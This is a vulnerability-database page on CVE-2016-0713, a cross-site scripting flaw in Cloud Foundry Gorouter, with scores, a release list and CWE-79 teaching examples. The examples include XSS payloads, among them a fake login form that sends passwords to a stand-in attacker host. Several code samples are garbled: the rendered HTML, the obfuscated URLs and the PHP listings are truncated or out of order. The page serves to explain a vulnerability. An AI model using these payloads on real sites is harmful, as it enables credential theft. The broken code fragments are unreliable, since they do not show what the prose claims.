CVE-2016-0713 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Severity

26%

Complexity

49%

Confidentiality

48%

Gorouter in Cloud Foundry cf-release v141 through v228 allows man-in-the-middle attackers to conduct cross-site scripting (XSS) attacks via vectors related to modified requests.

Gorouter in Cloud Foundry cf-release v141 through v228 allows man-in-the-middle attackers to conduct cross-site scripting (XSS) attacks via vectors related to modified requests.

CVSS 3.0 Base Score 4.7. CVSS Attack Vector: network. CVSS Attack Complexity: high. CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N).

CVSS 2.0 Base Score 2.6. CVSS Attack Vector: network. CVSS Attack Complexity: high. CVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N).

Demo Examples

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.


               
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as


               
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialogue popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker:


               
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div>

If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser:


               
</div></div>
</form>
<input type="submit" value="Login" />

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):


               
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:


               
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example also displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.


               
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.


               
<p><asp:label id="EmployeeID" runat="server" /></p>

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example covers a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.


               
Employee Name: <%= name %>
String name = rs.getString("name");

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.


               
<p><asp:label id="EmployeeName" runat="server" /></p>

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php


               
/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php


               
echo '</div>';
exit;
//Print list of users to page
echo '<div class="userNames">'.$row['fullname'].'</div>';

The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

Consider an application that provides a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement:


               
saveMessage($announceStr);//save HTML-formatted message to file; implementation details are irrelevant for this example.

An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like:


               
<script>document.alert('Hacked');</script>

The raw contents of the message file would look like:


               
<script>document.alert('Hacked');</script> has logged in.

For each person who visits the message page, their browser would execute the script, generating a pop-up window that says "Hacked". More malicious attacks are possible; see the rest of this entry.

Overview

Type

Cloud Foundry cf-release

First reported 7 years ago

2017-08-31 14:29:00

Last updated 7 years ago

2017-09-05 18:48:00

Affected Software

Cloud Foundry cf-release 141

141

Cloud Foundry cf-release 142

142

Cloud Foundry cf-release 143

143

Cloud Foundry cf-release 144

144

Cloud Foundry cf-release 145

145

Cloud Foundry cf-release 146

146

Cloud Foundry cf-release 147

147

Cloud Foundry cf-release 148

148

Cloud Foundry cf-release 149

149

Cloud Foundry cf-release 150

150

Cloud Foundry cf-release 151

151

Cloud Foundry cf-release 152

152

Cloud Foundry cf-release 153

153

Cloud Foundry cf-release 154

154

Cloud Foundry cf-release 155

155

Cloud Foundry cf-release 156

156

Cloud Foundry cf-release 157

157

Cloud Foundry cf-release 158

158

Cloud Foundry cf-release 159

159

Cloud Foundry cf-release 160

160

Cloud Foundry cf-release 161

161

Cloud Foundry cf-release 162

162

Cloud Foundry cf-release 163

163

Cloud Foundry cf-release 164

164

Cloud Foundry cf-release 165

165

Cloud Foundry cf-release 166

166

Cloud Foundry cf-release 167

167

Cloud Foundry cf-release 168

168

Cloud Foundry cf-release 169

169

Cloud Foundry cf-release 170

170

Cloud Foundry cf-release 171

171

Cloud Foundry cf-release 172

172

Cloud Foundry cf-release 173

173

Cloud Foundry cf-release 174

174

Cloud Foundry cf-release 175

175

Cloud Foundry cf-release 176

176

Cloud Foundry cf-release 177

177

Cloud Foundry cf-release 178

178

Cloud Foundry cf-release 179

179

Cloud Foundry cf-release 180

180

Cloud Foundry cf-release 181

181

Cloud Foundry cf-release 182

182

Cloud Foundry cf-release 183

183

Cloud Foundry cf-release 184

184

Cloud Foundry cf-release 185

185

Cloud Foundry cf-release 186

186

Cloud Foundry cf-release 187

187

Cloud Foundry cf-release 188

188

Cloud Foundry cf-release 189

189

Cloud Foundry cf-release 190

190

Cloud Foundry cf-release 191

191

Cloud Foundry cf-release 192

192

Cloud Foundry cf-release 193

193

Cloud Foundry cf-release 194

194

Cloud Foundry cf-release 195

195

Cloud Foundry cf-release 196

196

Cloud Foundry cf-release 197

197

Cloud Foundry cf-release 198

198

Cloud Foundry cf-release 199

199

Cloud Foundry cf-release 200

200

Cloud Foundry cf-release 201

201

Cloud Foundry cf-release 202

202

Cloud Foundry cf-release 203

203

Cloud Foundry cf-release 204

204

Cloud Foundry cf-release 205

205

Cloud Foundry cf-release 206

206

Cloud Foundry cf-release 207

207

Cloud Foundry cf-release 208

208

Cloud Foundry cf-release 209

209

Cloud Foundry cf-release 210

210

Cloud Foundry cf-release 211

211

Cloud Foundry cf-release 212

212

Cloud Foundry cf-release 213

213

Cloud Foundry cf-release 214

214

Cloud Foundry cf-release 215

215

Cloud Foundry cf-release 216

216

Cloud Foundry cf-release 217

217

Cloud Foundry cf-release 218

218

Cloud Foundry cf-release 219

219

Cloud Foundry cf-release 220

220

Cloud Foundry cf-release 221

221

Cloud Foundry cf-release 222

222

Cloud Foundry cf-release 223

223

Cloud Foundry cf-release 224

224

Cloud Foundry cf-release 225

225

Cloud Foundry cf-release 226

226

Cloud Foundry cf-release 227

227

Cloud Foundry cf-release 228

228

Stay updated

ExploitPedia is constantly evolving. Sign up to receive a notification when we release additional functionality.

Get in touch

If you'd like to report a bug or have any suggestions for improvements then please do get in touch with us using this form. We will get back to you as soon as we can.